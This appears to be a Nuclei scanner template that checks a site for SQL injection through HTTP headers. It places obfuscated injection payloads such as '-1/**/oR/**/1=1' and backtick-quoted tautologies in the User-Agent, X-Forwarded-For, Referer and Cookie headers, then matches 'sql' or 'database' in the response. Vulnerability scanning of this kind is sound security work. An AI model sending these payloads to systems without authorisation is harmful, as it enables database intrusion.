id: header-sqli

info:
  name: Request header based sqli
  author: panch0r3d
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    redirects: true
    max-redirects: 5
    headers:
      User-Agent: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      X-Forwarded-For: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      Referer: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      Cookie: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(s|S)(q|Q)(l|L)"
          - "(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E)"
        part: body
